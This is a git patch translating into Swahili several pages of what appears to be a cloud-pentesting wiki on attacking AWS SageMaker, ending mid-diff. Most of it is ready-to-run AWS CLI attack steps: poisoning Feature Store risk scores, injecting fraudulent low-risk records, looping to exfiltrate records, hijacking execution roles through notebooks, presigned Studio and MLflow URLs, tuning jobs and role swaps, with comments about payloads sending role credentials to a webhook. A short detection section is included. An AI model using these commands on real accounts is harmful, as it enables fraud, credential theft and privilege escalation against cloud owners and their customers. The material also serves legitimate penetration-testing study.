From d79bfbb2f385c46023f6ceebf7595f2048da8eb7 Mon Sep 17 00:00:00 2001 From: Translator Date: Fri, 17 Oct 2025 15:55:25 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws --- .../feature-store-poisoning.md | 172 ++++++++++-- .../aws-sagemaker-privesc/README.md | 264 +++++++++++++++--- .../aws-services/aws-sagemaker-enum/README.md | 92 +++--- .../README.md | 107 +------ 4 files changed, 419 insertions(+), 216 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md index 55daa3703..0727c5528 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md @@ -1,50 +1,160 @@ # SageMaker Feature Store online store poisoning -Tumia vibaya `sagemaker:PutRecord` kwenye Feature Group iliyowezeshwa OnlineStore ili kuandika upya thamani za vipengele zinazotumika moja kwa moja na online inference. Ikiwa imeunganishwa na `sagemaker:GetRecord`, mshambuliaji anaweza kusoma vipengele nyeti. Hii haihitaji ufikiaji wa models au endpoints. +Tumia kwa mabaya `sagemaker:PutRecord` kwenye Feature Group yenye OnlineStore imewezeshwa ili kubadilisha (overwrite) thamani za feature zinayotumika na online inference. Ikitumika pamoja na `sagemaker:GetRecord`, mshambuliaji anaweza kusoma features nyeti na exfiltrate data ya ML ya siri. Hii haihitaji ufikiaji wa models au endpoints, na hivyo ni shambulio la moja kwa moja kwenye tabaka la data. ## Mahitaji - Ruhusa: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord` -- Lengo: Feature Group iliyowezeshwa OnlineStore (kawaida ikiwa nyuma ya inference ya wakati halisi) +- Lengo: Feature Group yenye OnlineStore imewezeshwa (kawaida inasaidia real-time inference) +- Ugumu: **LOW** - Amri rahisi za AWS CLI, hakuna urekebishaji wa modeli unaohitajika ## Hatua -1) Chagua au unda Feature Group ndogo ya Online kwa ajili ya majaribio + +### Reconnaissance + +1) Orodhesha Feature Groups zenye OnlineStore zimewezeshwa +```bash +REGION=${REGION:-us-east-1} +aws sagemaker list-feature-groups \ +--region $REGION \ +--query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \ +--output table +``` +2) Elezea Feature Group lengwa ili kuelewa schema yake +```bash +FG= +aws sagemaker describe-feature-group \ +--region $REGION \ +--feature-group-name "$FG" +``` +Kumbuka `RecordIdentifierFeatureName`, `EventTimeFeatureName`, na definisheni zote za feature. Hizi zinahitajika ili kuunda rekodi halali. + +### Senario la Shambulio 1: Uchafuzi wa Data (Kuandika tena rekodi zilizopo) + +1) Soma rekodi halali ya sasa +```bash +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string user-001 +``` +2) Chafua rekodi kwa thamani zenye madhara kwa kutumia parameter ya inline `--record` +```bash +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + +# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user +aws sagemaker-featurestore-runtime put-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record "[ +{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"}, +{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, +{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"}, +{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"}, +{\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"} +]" \ +--target-stores OnlineStore +``` +3) Thibitisha data iliyopotoshwa +```bash +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string user-001 +``` +**Athari**: Modeli za ML zinazotumia sifa hii sasa zitaona `risk_score=0.99` kwa mtumiaji halali, na inaweza kuzizuia miamala yao au huduma zao. + +### Senario ya Shambulio 2: Malicious Data Injection (Create Fraudulent Records) + +Ingiza rekodi mpya kabisa zenye sifa zilizofanyiwa udanganyifu ili kuepuka udhibiti wa usalama: +```bash +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + +# Create fake user with artificially low risk to perform fraudulent transactions +aws sagemaker-featurestore-runtime put-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record "[ +{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"}, +{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, +{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"}, +{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"}, +{\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"} +]" \ +--target-stores OnlineStore +``` +Thibitisha the injection: +```bash +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string user-999 +``` +**Athari**: Attacker anaunda kitambulisho bandia chenye alama ya hatari ya chini (0.01) ambacho kinaweza kufanya miamala ya udanganyifu zenye thamani kubwa bila kuamsha fraud detection. + +### Senario ya Shambulio 3: Sensitive Data Exfiltration + +Soma rekodi nyingi ili kutoa features za siri na kuchambua tabia ya modeli: +```bash +# Exfiltrate data for known users +for USER_ID in user-001 user-002 user-003 user-999; do +echo "Exfiltrating data for ${USER_ID}:" +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string ${USER_ID} +done +``` +**Athari**: Vipengele vya siri (alama za hatari, mifumo ya miamala, data za kibinafsi) vinafunuliwa kwa mshambuliaji. + +### Kuunda Feature Group ya Mtihani/Demo (Hiari) + +Iwapo unahitaji kuunda Feature Group ya mtihani: ```bash REGION=${REGION:-us-east-1} FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text) if [ -z "$FG" -o "$FG" = "None" ]; then ACC=$(aws sts get-caller-identity --query Account --output text) -FG=ht-fg-$ACC-$(date +%s) +FG=test-fg-$ACC-$(date +%s) ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole) -aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN" + +aws sagemaker create-feature-group \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-feature-name entity_id \ +--event-time-feature-name event_time \ +--feature-definitions "[ +{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"}, +{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"}, +{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}, +{\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"}, +{\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"} +]" \ +--online-store-config "{\"EnableOnlineStore\":true}" \ +--role-arn "$ROLE_ARN" + echo "Waiting for feature group to be in Created state..." for i in $(seq 1 40); do ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true) -echo $ST; [ "$ST" = "Created" ] && break; sleep 15 +echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15 done fi -``` -2) Ingiza/andika upya rekodi mtandaoni (poison) -```bash -NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) -cat > /tmp/put.json << JSON -{ -"FeatureGroupName": "$FG", -"Record": [ -{"FeatureName": "entity_id", "ValueAsString": "user-123"}, -{"FeatureName": "event_time", "ValueAsString": "$NOW"}, -{"FeatureName": "risk_score", "ValueAsString": "0.99"} -], -"TargetStores": ["OnlineStore"] -} -JSON -aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json -``` -3) Soma rekodi tena ili kuthibitisha mabadiliko -```bash -aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString" -``` -Inatarajiwa: risk_score irudie 0.99 (attacker-set), ikithibitisha uwezo wa kubadilisha vipengele vya mtandaoni vinavyotumika na models. -## Athari -- Shambulio la uadilifu la wakati halisi: badilisha vipengele vinavyotumika na models za uzalishaji bila kugusa endpoints/models. -- Hatari ya usiri: soma vipengele nyeti kupitia GetRecord kutoka OnlineStore. +echo "Feature Group ready: $FG" +``` +## Ugunduzi + +Fuatilia CloudTrail kwa mifumo ya kutatanisha: +- `PutRecord` events from unusual IAM principals or IP addresses +- Wito wa juu wa `PutRecord` au `GetRecord` +- `PutRecord` with anomalous feature values (e.g., `risk_score` outside normal range) +- Operesheni kubwa za `GetRecord` zinazoonyesha mass exfiltration +- Ufikiaji nje ya saa za kawaida za kazi au kutoka maeneo yasiyotegemewa + +Tekeleza ugunduzi wa anomalia: +- Uthibitishaji wa thamani za feature (e.g., `risk_score` must be 0.0-1.0) +- Uchambuzi wa mifumo ya uandishi (frequency, timing, source identity) +- Ugunduzi wa mabadiliko ya data (sudden changes in feature distributions) + +## Marejeo +- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html) +- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md index 2654d3a99..4dbb3a11c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md @@ -6,34 +6,116 @@ ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` -Anza kuunda noteboook na IAM Role iliyounganishwa ili kupata ufikiaji: +Anza kuunda noteboook ukiwa na IAM Role iliyounganishwa ili kupata access yake: ```bash aws sagemaker create-notebook-instance --notebook-instance-name example \ --instance-type ml.t2.medium \ --role-arn arn:aws:iam:::role/service-role/ ``` -Jibu linapaswa kuwa na uwanja wa `NotebookInstanceArn`, ambao utakuwa na ARN ya notebook instance mpya iliyoundwa. Tunaweza kisha kutumia API ya `create-presigned-notebook-instance-url` kutengeneza URL ambayo tunaweza kutumia kufikia notebook instance mara itakapokuwa tayari: +Majibu yanapaswa kuwa na uwanja wa `NotebookInstanceArn`, ambao utakuwa na ARN ya notebook instance iliyoumbwa hivi karibuni. Baadaye tunaweza kutumia API ya `create-presigned-notebook-instance-url` kuunda URL ambayo tunaweza kutumia kufikia notebook instance mara itakapokuwa tayari: ```bash aws sagemaker create-presigned-notebook-instance-url \ --notebook-instance-name ``` -Navigate to the URL with the browser and click on `Open JupyterLab`` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. +Nenda kwenye URL kwa kutumia kivinjari na bonyeza `Open JupyterLab` upande wa juu kulia, kisha shuka chini hadi kichupo cha “Launcher” na chini ya sehemu ya “Other”, bonyeza kitufe cha “Terminal”. -Sasa inawezekana kufikia metadata credentials za IAM Role. +Sasa inawezekana kupata metadata credentials za IAM Role. -**Athari Inayowezekana:** Privesc kwa sagemaker service role iliyotajwa. +**Athari Inayowezekana:** Privesc to the sagemaker service role specified. ### `sagemaker:CreatePresignedNotebookInstanceUrl` -Ikiwa kuna Jupyter **notebooks tayari zinaendesha** juu yake na unaweza kuorodhesha kwa `sagemaker:ListNotebookInstances` (au kuzitambua kwa njia nyingine yoyote). Unaweza **kutengeneza URL kwao, kufikia, na kuiba credentials kama ilivyoelezwa katika mbinu iliyotangulia**. +Ikiwa kuna Jupyter **notebooks tayari zinakimbia** juu yake na unaweza kuziorodhesha kwa `sagemaker:ListNotebookInstances` (au kuzibaini kwa njia nyingine yoyote). Unaweza **kuunda URL kwao, kuzifikia, na kuiba credentials kama ilivyotajwa katika mbinu iliyotangulia**. ```bash aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name ``` -**Athari Inayoweza Kutokea:** Privesc kwa sagemaker service role iliyounganishwa. +**Athari Inayoweza Kutokea:** Privesc kwa sagemaker service role iliyohusishwa. + +## `sagemaker:CreatePresignedDomainUrl` + +> [!WARNING] +> Shambulio hili linafanya kazi tu kwenye domain za zamani za jadi za SageMaker Studio, sio zile zilizotengenezwa na SageMaker Unified Studio. Domains kutoka Unified Studio zitarudisha hitilafu: "This SageMaker AI Domain was created by SageMaker Unified Studio and must be accessed via SageMaker Unified Studio Portal". + +Kitambulisho chenye ruhusa ya kuita `sagemaker:CreatePresignedDomainUrl` kwenye Studio `UserProfile` lengwa kinaweza kutengeneza URL ya kuingia inayothibitisha moja kwa moja ndani ya SageMaker Studio kama profile hiyo. Hii inampa kivinjari cha mshambuliaji kikao cha Studio kinachoirithisha ruhusa za profile za `ExecutionRole` na upatikanaji kamili wa home ya profile iliyounganishwa na EFS na apps. Hakuna `iam:PassRole` au ufikiaji wa console unahitajika. + +**Mahitaji**: +- SageMaker Studio `Domain` na `UserProfile` lengwa ndani yake. +- Mhusika (principal) wa mshambuliaji anahitaji `sagemaker:CreatePresignedDomainUrl` kwenye `UserProfile` lengwa (kwa kiwango cha rasilimali) au `*`. + +Mfano wa sera ya chini kabisa (scoped to one UserProfile): +```json +{ +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "sagemaker:CreatePresignedDomainUrl", +"Resource": "arn:aws:sagemaker:::user-profile//" +} +] +} +``` +**Hatua za Matumizi Mabaya**: + +1) Orodhesha Studio Domain na UserProfiles ambavyo unaweza kulenga +```bash +DOM=$(aws sagemaker list-domains --query 'Domains[0].DomainId' --output text) +aws sagemaker list-user-profiles --domain-id-equals $DOM +TARGET_USER= +``` +2) Angalia kama unified studio haitumiki (shambulio linafanya kazi tu kwenye domaini za kawaida za SageMaker Studio) +```bash +aws sagemaker describe-domain --domain-id --query 'DomainSettings' +# If you get info about unified studio, this attack won't work +``` +3) Tengeneza presigned URL (inayofanya kazi kwa takriban ~5 dakika kwa chaguo-msingi) +```bash +aws sagemaker create-presigned-domain-url \ +--domain-id $DOM \ +--user-profile-name $TARGET_USER \ +--query AuthorizedUrl --output text +``` +4) Fungua URL iliyorejeshwa kwenye kivinjari ili kuingia kwenye Studio kama mtumiaji lengwa. Katika terminal ya Jupyter ndani ya Studio thibitisha utambulisho wa ufanisi au exfiltrate the token: +```bash +aws sts get-caller-identity +``` +Vidokezo: +- `--landing-uri` inaweza kutowekwa. Baadhi ya thamani (mfano, `app:JupyterLab:/lab`) zinaweza kukataliwa kulingana na flavor/version ya Studio; defaults kawaida zinaelekeza kwanza kwenye home ya Studio kisha kwenda Jupyter. +- Sera za shirika/VPC endpoint restrictions zinaweza bado kuzuia upatikanaji wa mtandao; utengenezaji wa tokeni hautaji kuingia kwenye console au `iam:PassRole`. + +**Athari Inayoweza Kutokea**: Mwendo wa upande na kuongezeka kwa idhini kwa kutokea kama UserProfile yoyote ya Studio yenye ARN iliyoruhusiwa, ukirithi `ExecutionRole` yake na filesystem/apps zake. + + +### `sagemaker:CreatePresignedMlflowTrackingServerUrl`, `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments` + +Kitambulisho chenye ruhusa ya kuita `sagemaker:CreatePresignedMlflowTrackingServerUrl` (na `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments` kwa upatikanaji wa baadaye) kwa lengo la SageMaker MLflow Tracking Server kinaweza kutengeneza presigned URL ya matumizi moja inayothibitisha moja kwa moja kwa MLflow UI iliyosimamiwa kwa server hiyo. Hii inatoa upatikanaji sawa na mtumiaji halali angekuwa nayo kwa server (kuona/kutengeneza experiments na runs, na kupakua/kupakia artifacts katika S3 artifact store ya server). + +**Mahitaji:** +- SageMaker MLflow Tracking Server katika account/region na jina lake. +- Msemaji wa mshambuliaji anahitaji `sagemaker:CreatePresignedMlflowTrackingServerUrl` kwenye rasilimali ya lengo la MLflow Tracking Server (au `*`). + +**Hatua za matumizi mabaya**: + +1) Orodhesha MLflow Tracking Servers unazoweza kulenga na chagua jina moja +```bash +aws sagemaker list-mlflow-tracking-servers \ +--query 'TrackingServerSummaries[].{Name:TrackingServerName,Status:TrackingServerStatus}' +TS_NAME= +``` +2) Tengeneza presigned MLflow UI URL (itakayokuwa halali kwa muda mfupi) +```bash +aws sagemaker create-presigned-mlflow-tracking-server-url \ +--tracking-server-name "$TS_NAME" \ +--query AuthorizedUrl --output text +``` +3) Fungua URL iliyorejeshwa katika kivinjari ili kufikia MLflow UI kama mtumiaji aliyeidhinishwa kwa Tracking Server hiyo. + +**Athari Inayoweza Kutokea:** Ufikiaji wa moja kwa moja wa MLflow UI iliyosimamiwa kwa Tracking Server lengwa, unaowawezesha kuona na kubadilisha experiments/runs, pamoja na kupata au kupakia artifacts zilizohifadhiwa katika S3 artifact store iliyosanidiwa kwenye server, kwa mujibu wa ruhusa zinazotekelezwa na usanidi wa server. + ### `sagemaker:CreateProcessingJob`, `iam:PassRole` -Mshambuliaji mwenye ruhusa hizo anaweza kufanya **SageMaker iteekeleze processing job** na SageMaker role iliyounganishwa nayo. Kwa kutumia tena mmoja wa AWS Deep Learning Containers ambao tayari ina Python (na kuendesha job katika mkoa uleule kama URI), unaweza kuendesha code inline bila kujenga images zako mwenyewe: +Mshambuliaji mwenye ruhusa hizo anaweza kusababisha **SageMaker iendeshe processing job** ikiwa na role ya SageMaker imeambatishwa. Kwa kutumia tena mojawapo ya AWS Deep Learning Containers ambayo tayari ina Python (na kwa kuendesha job katika eneo sawa na URI), unaweza kuanzisha code inline bila kuunda images zako mwenyewe: ```bash REGION= ROLE_ARN= @@ -49,11 +131,11 @@ aws sagemaker create-processing-job \ # Las credenciales llegan al webhook indicado. Asegúrate de que el rol tenga permisos ECR (AmazonEC2ContainerRegistryReadOnly) para descargar la imagen. ``` -**Potential Impact:** Privesc kwa sagemaker service role iliyotajwa. +**Athari Inayoweza Kutokea:** Privesc kwa sagemaker service role iliyotajwa. ### `sagemaker:CreateTrainingJob`, `iam:PassRole` -Mshambuliaji mwenye ruhusa hizo anaweza kuanzisha training job itakayoweza kuendesha msimbo yoyote kwa role iliyotajwa. Kwa kutumia container rasmi ya SageMaker na kubadilisha entrypoint kwa payload inline, hauhitaji kujenga images zako mwenyewe: +Mshambuliaji akiwa na ruhusa hizo anaweza kuanzisha training job ambayo inatekeleza msimbo wa hiari kwa kutumia role iliyotajwa. Kwa kutumia container rasmi ya SageMaker na kubadilisha entrypoint kwa payload inline, hauhitaji kujenga images zako mwenyewe: ```bash REGION= ROLE_ARN= @@ -73,11 +155,11 @@ aws sagemaker create-training-job \ # El payload se ejecuta en cuanto el job pasa a InProgress y exfiltra las credenciales del rol. ``` -**Athari Inayowezekana:** Privesc kwa SageMaker service role iliyotajwa. +**Athari Inayoweza Kutokea:** Privesc kwa role ya huduma ya SageMaker iliyotajwa. ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` -Mshambulizi mwenye ruhusa hizo anaweza kuanzisha HyperParameter Tuning Job ambayo inaendesha attacker-controlled code chini ya role iliyotolewa. Script mode inahitaji kuhifadhi payload katika S3, lakini hatua zote zinaweza kuendeshwa kiotomatiki kutoka kwa CLI: +Mshambuliaji mwenye ruhusa hizo anaweza kuanzisha HyperParameter Tuning Job ambayo itaendesha msimbo unaodhibitiwa na mshambuliaji chini ya role iliyotolewa. Script mode inahitaji kuhifadhi payload katika S3, lakini hatua zote zinaweza kuendeshwa kiotomatiki kupitia CLI: ```bash REGION= ROLE_ARN= @@ -183,28 +265,29 @@ aws sagemaker create-hyper-parameter-tuning-job \ --hyper-parameter-tuning-job-config '{"Strategy":"Random","ResourceLimits":{"MaxNumberOfTrainingJobs":1,"MaxParallelTrainingJobs":1},"HyperParameterTuningJobObjective":{"Type":"Maximize","MetricName":"train:loss"}}' \ --training-job-definition file:///tmp/hpo-definition.json ``` -Kila mafunzo yanayozinduliwa na mchakato huchapisha kipimo na exfiltrate credentials za role iliyotajwa. +Kila mafunzo unaozinduliwa na mchakato huchapisha kipimo na hutoa kwa siri kredensiali za role iliyotajwa. -### `sagemaker:UpdateUserProfile`/`UpdateSpace`/`UpdateDomain` Studio role swap (no `iam:PassRole`) +### `sagemaker:UpdateUserProfile`, `iam:PassRole`, `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`) -Kipaumbele cha ExecutionRole: +Kwa ruhusa ya kusasisha SageMaker Studio User Profile, kuunda app, presigned URL kwa app na `iam:PassRole`, mshambuliaji anaweza kuweka `ExecutionRole` kwa role yoyote ya IAM ambayo service principal ya SageMaker inaweza kuikubali. Apps mpya za Studio zinazozinduliwa kwa profile hiyo zitaendeshwa kwa role iliyobadilishwa, zikitoa ruhusa za kuongezwa za kiingiliano kupitia Jupyter terminals au jobs zinazozinduliwa kutoka Studio. -- `UserProfile` hupitisha thamani nyingine yoyote. Ikiwa profaili ina `ExecutionRole`, Studio itatumia role hiyo kila wakati. -- `Space` inatumika tu wakati profaili haina role yake mwenyewe; vinginevyo, ile ya profaili ndiyo itabakia. -- `Domain DefaultUserSettings` hufanya kazi kama suluhisho la mwisho wakati wala profaili wala space hawatafafanua role. - -Ili kuwa na ruhusa za kusasisha SageMaker Studio User Profile (au Space/Domain), mshambuliaji anaweza kuweka `ExecutionRole` kwa role yoyote ya IAM ambayo service principal ya SageMaker inaweza kuchukua. Tofauti na APIs za kuunda jobs, APIs za kusasisha profile za Studio hazihitaji `iam:PassRole`. Apps mpya za Studio zinazozinduliwa kwa profaili hiyo zitaendesha kwa role iliyobadilishwa, zikitoa ruhusa za juu za kiingiliano kupitia terminali za Jupyter au jobs zilizoanzishwa kutoka Studio. +> [!WARNING] +> Shambulio hili linataka kwamba hakuna applications kwenye profile, vinginevyo uundaji wa app utakosa na kosa linalofanana na: `An error occurred (ValidationException) when calling the UpdateUserProfile operation: Unable to update UserProfile [arn:aws:sagemaker:us-east-1:947247140022:user-profile/d-fcmlssoalfra/test-user-profile-2] with InService App. Delete all InService apps for UserProfile and try again.` +> Ikiwa kuna app yoyote utahitaji ruhusa ya `sagemaker:DeleteApp` ili kuzifuta kwanza. Hatua: ```bash -# 1) List Studio user profiles and pick a target +# 1) List Studio domains and pick a target +aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' + +# 2) List Studio user profiles and pick a target aws sagemaker list-user-profiles --domain-id-equals # Choose a more-privileged role that already trusts sagemaker.amazonaws.com ROLE_ARN=arn:aws:iam:::role/ -# 2) Update the Studio profile to use the new role (no iam:PassRole) +# 3) Update the Studio profile to use the new role (no iam:PassRole) aws sagemaker update-user-profile \ --domain-id \ --user-profile-name \ @@ -215,18 +298,59 @@ aws sagemaker describe-user-profile \ --user-profile-name \ --query 'UserSettings.ExecutionRole' --output text -# 3) If the tenant uses Studio Spaces, swap the ExecutionRole at the space level -aws sagemaker update-space \ ---domain-id \ ---space-name \ ---space-settings ExecutionRole=$ROLE_ARN +# 3.1) Optional if you need to delete existing apps first +# List existing apps +aws sagemaker list-apps \ +--domain-id-equals -aws sagemaker describe-space \ +# Delete an app +aws sagemaker delete-app \ --domain-id \ ---space-name \ ---query 'SpaceSettings.ExecutionRole' --output text +--user-profile-name \ +--app-type JupyterServer \ +--app-name -# 4) Optionally, change the domain default so every profile inherits the new role +# 4) Create a JupyterServer app for a user profile (will inherit domain default role) +aws sagemaker create-app \ +--domain-id \ +--user-profile-name \ +--app-type JupyterServer \ +--app-name + + +# 5) Generate a presigned URL to access Studio with the new domain default role +aws sagemaker create-presigned-domain-url \ +--domain-id \ +--user-profile-name \ +--query AuthorizedUrl --output text + +# 6) Open the URL in browser, navigate to JupyterLab, open Terminal and verify: +# aws sts get-caller-identity +# (should show the high-privilege role from domain defaults) + +``` +**Potential Impact**: Privilege escalation kwa ruhusa za execution role ya SageMaker iliyotajwa kwa interactive Studio sessions. + + +### `sagemaker:UpdateDomain`, `sagemaker:CreateApp`, `iam:PassRole`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`) + +Kwa ruhusa za kubadilisha SageMaker Studio Domain, kuunda app, presigned URL kwa app, na `iam:PassRole`, mshambuliaji anaweza kuweka default domain `ExecutionRole` kuwa IAM role yoyote ambayo SageMaker service principal inaweza assume. Apps mpya za Studio zinazozinduliwa kwa profaili hiyo zitaendeshwa kwa role iliyobadilishwa, zikitoa ruhusa zilizoinuliwa kwa njia ya kiingiliano kupitia terminal za Jupyter au jobs zinazozinduliwa kutoka Studio. + +> [!WARNING] +> Shambulizi hili linahitaji kuwa hakuna applications ndani ya domain, vinginevyo uundaji wa app utashindwa kwa kosa: `An error occurred (ValidationException) when calling the UpdateDomain operation: Unable to update Domain [arn:aws:sagemaker:us-east-1:947247140022:domain/d-fcmlssoalfra] with InService App. Delete all InService apps in the domain including shared Apps for [domain-shared] User Profile, and try again.` + +Hatua: +```bash +# 1) List Studio domains and pick a target +aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' + +# 2) List Studio user profiles and pick a target +aws sagemaker list-user-profiles --domain-id-equals + +# Choose a more-privileged role that already trusts sagemaker.amazonaws.com +ROLE_ARN=arn:aws:iam:::role/ + +# 3) Change the domain default so every profile inherits the new role aws sagemaker update-domain \ --domain-id \ --default-user-settings ExecutionRole=$ROLE_ARN @@ -235,22 +359,86 @@ aws sagemaker describe-domain \ --domain-id \ --query 'DefaultUserSettings.ExecutionRole' --output text -# 5) Launch a JupyterServer app (or generate a presigned URL) so new sessions assume the swapped role -aws sagemaker create-app \ +# 3.1) Optional if you need to delete existing apps first +# List existing apps +aws sagemaker list-apps \ +--domain-id-equals + +# Delete an app +aws sagemaker delete-app \ --domain-id \ --user-profile-name \ --app-type JupyterServer \ ---app-name js-atk +--app-name -# Optional: create a presigned Studio URL and, inside a Jupyter terminal, run: -# aws sts get-caller-identity # should reflect the new ExecutionRole +# 4) Create a JupyterServer app for a user profile (will inherit domain default role) +aws sagemaker create-app \ +--domain-id \ +--app-type JupyterServer \ +--app-name js-domain-escalated + +# 5) Generate a presigned URL to access Studio with the new domain default role aws sagemaker create-presigned-domain-url \ --domain-id \ --user-profile-name \ --query AuthorizedUrl --output text -``` -**Athari Inayowezekana**: Privilege escalation hadi ruhusa za execution role ya SageMaker iliyotajwa kwa ajili ya vikao vya Studio vinavyoshirikiana. +# 6) Open the URL in browser, navigate to JupyterLab, open Terminal and verify: +# aws sts get-caller-identity +# (should show the high-privilege role from domain defaults) +``` +**Athari Inayowezekana**: Kupandishwa kwa cheo (privilege escalation) hadi ruhusa za SageMaker execution role zilizotajwa kwa vikao vya Studio vinavyoshirikiana. + +### `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl` + +Mshambulizi mwenye ruhusa ya kuunda app ya SageMaker Studio kwa UserProfile lengwa anaweza kuanzisha app ya JupyterServer inayotumia `ExecutionRole` ya profile. Hii inatoa upatikanaji wa kiingilizi kwa ruhusa za role kupitia terminal za Jupyter au jobs zinazoanzishwa kutoka Studio. + +Hatua: +```bash +# 1) List Studio domains and pick a target +aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' + +# 2) List Studio user profiles and pick a target +aws sagemaker list-user-profiles --domain-id-equals + +# 3) Create a JupyterServer app for the user profile +aws sagemaker create-app \ +--domain-id \ +--user-profile-name \ +--app-type JupyterServer \ +--app-name js-privesc + +# 4) Generate a presigned URL to access Studio +aws sagemaker create-presigned-domain-url \ +--domain-id \ +--user-profile-name \ +--query AuthorizedUrl --output text + +# 5) Open the URL in browser, navigate to JupyterLab, open Terminal and verify: +# aws sts get-caller-identity +``` +**Athari Inayoweza Kutokea**: Ufikiaji wa kuingiliana kwa execution role ya SageMaker iliyounganishwa na UserProfile lengwa. + + +### `iam:GetUser`, `datazone:CreateUserProfile` + +Mshambuliaji mwenye ruhusa hizo anaweza kumpa mtumiaji ufikiaji wa IAM ndani ya Sagemaker Unified Studio Domain kwa kuunda DataZone User Profile kwa mtumiaji huyo. +```bash +# List domains +aws datazone list-domains --region us-east-1 \ +--query "items[].{Id:id,Name:name}" \ +--output json + +# Add IAM user as a user of the domain +aws datazone create-user-profile \ +--region us-east-1 \ +--domain-identifier \ +--user-identifier \ +--user-type IAM_USER +``` +URL ya Unified Domain ina muundo ufuatao: `https://.sagemaker..on.aws/` (kwa mfano `https://dzd-cmixuznq0h8cmf.sagemaker.us-east-1.on.aws/`). + +**Athari Inayowezekana:** Ufikiaji wa Sagemaker Unified Studio Domain kama mtumiaji, ikimruhusu kufikia rasilimali zote ndani ya domain ya Sagemaker na hata kuinua vibali hadi role inayotumiwa na notebooks ndani ya Sagemaker Unified Studio Domain. ## Marejeo diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md index 600b6a1fc..21013cf87 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md +++ 